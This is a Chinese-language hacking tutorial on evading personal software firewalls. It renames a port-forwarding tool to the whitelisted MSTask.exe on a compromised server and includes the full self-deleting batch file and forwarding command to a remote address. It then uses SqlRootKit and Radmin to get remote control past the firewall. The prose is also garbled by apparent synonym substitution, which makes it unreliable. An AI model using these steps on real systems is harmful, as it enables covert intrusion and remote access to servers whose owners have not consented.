冲破防火墙的通用办法[网络技术]

一向以来都有一个巨大的设法:如果能发现些漏洞或BUG什么的该多好啊!于是成天对着电脑瞎弄瞎研究,研究什么呢?研究若何冲破防火墙（偶这里指的防火墙是软体型的个人防火墙,硬件的偶也没条件.）嘿嘿,你还别说,还真没白研究,还真给偶发现了大大都防火墙的通病.这个BUG能让我们拐骗防火墙来到达访外的目的,具体情形是怎么样的呢?请看下面的讲解!   

　　首先,我要介绍一下Windows系统特点,当一个程序运行时,它不能删除,但却可以改名!而当系统里的被保护程序遭到删除或破坏或改名时系统就会及时调用备份文件赐与复原!我再讲讲防火墙,大家都知道很多防火墙的“利用程序法则”里普通默许就会让IE浏览器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe通过,而大多的防火墙认为只如果与法则里的途径及文件名相同就Pass!以这样的检测办法来决意能否放行,但它却完好没考虑到假如是别的文件替换的呢?——就相当于古装片里的易容术,易容后就认不得了!这就给了我们机会,我们可以操纵这个BUG来拐骗防火墙来到达访外的目的!   

　　小知识:其实目前大多木马采取的DLL插线程技术也就是操纵了这个原理,它们首先躲藏的开启一个认证放行的程序进程（如Iexplore.exe进程）,接着把DLL型木马插入这个线程内,然后访外时便可轻松冲破防火墙的限制了——因为防火墙是不会拦阻已认证放行的程序的.   

　　原理讲完了,我们目前讲讲该若何操纵这个BUG了!这里我用虚拟机做实行,制造以下条件:   

　　为了更符合实际,我给服务器安装了“天网防火墙”、Radmin（但由于防火墙指定了拜候IP地址,所以没办法正常衔接!）,MSSQL SERVER、Serv-u.首先我们用常用的办法举行端口转发,看看防火墙有什么反映!   

　　第一步,启用AngelShell Ver 1.0里的Fport（用来举行端口转发的服务端,几近可以转发任何端口）,然后在本地用FportClient（用来举行端口转发的客户端）监听好!   

　　第二步,直接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”,这时我们看到虚拟机里的“天网”对Fport即刻举行了拦阻.   

　　看到了吧!由于Fport并非认证放行的,防火墙即刻就举行了拦阻!OK,目前我们实施拐骗筹划,看偶若何冲破防火墙的!还是履行第一步,然后新建一个批处理,内容以下:   

ren MSTask.exe MSTask1.exe   

ren fport.exe MSTask.exe   

MSTask.exe 4899 192.168.1.1 7788   

Del %0   

　　命名为go.bat,接着用SqlRootKit把“Fport.exe”和go.bat 一同copy到目标机子的c:\winnt\system32\（也就是MSTask所在的目录）在SqlRootKit里履行go.bat（注意假如要改MSTask.exe的名的话就需求有管理员权限）.   

　　当FportClient呈现“已经承遭到远程计算机的衔接!”时,用Radmin客户端衔接本机的4899端口.   

　　我们已经成功冲破限制（由于防火墙没有限制本地衔接4899端口,我们用Fport转发了它的端口,登录时等于本地衔接,因此我们可以成功衔接）,这样一来,我们本不能逃过防火墙的Fport便变成了一个有“插线程”技术的端口转发工具了!   

　　据我实行,国内的防火墙几近无一例外的“拥有”这个BUG!固然这个BUG不会带来什么大的危害,但老是给入侵者多了一个黑我们的机会!   

　　WTF垂老说独乐乐不如众乐乐,所以我还是公布出来了,一是可以让我们国内的防火墙有所改良,二是给网管们提个醒!由于小弟技术有限,不免会呈现错误,欢送各位指正批判.